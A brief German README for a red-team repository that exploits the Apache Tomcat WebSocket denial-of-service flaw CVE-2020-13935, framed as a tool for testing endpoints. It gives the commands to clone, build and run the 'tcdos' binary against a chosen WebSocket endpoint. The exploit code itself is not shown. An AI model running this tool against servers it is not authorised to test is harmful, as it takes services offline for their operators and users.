
Exploit für die Apache-Tomcat-WebSocket-Schwachstelle CVE-2020-13935, der das Testen von WebSocket-Endpunkten auf Denial-of-Service-Schwachstellen ermöglicht.
Im zugehörigen Blogbeitrag werden die Analyse und die Ausnutzung der Schwachstelle im Detail erklärt.
Klonen Sie das Repository und bauen Sie dann die tcdos-Binärdatei. Führen Sie das Programm wie folgt aus, um zu testen, ob ein bestimmter WebSocket-Endpunkt verwundbar ist:
$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]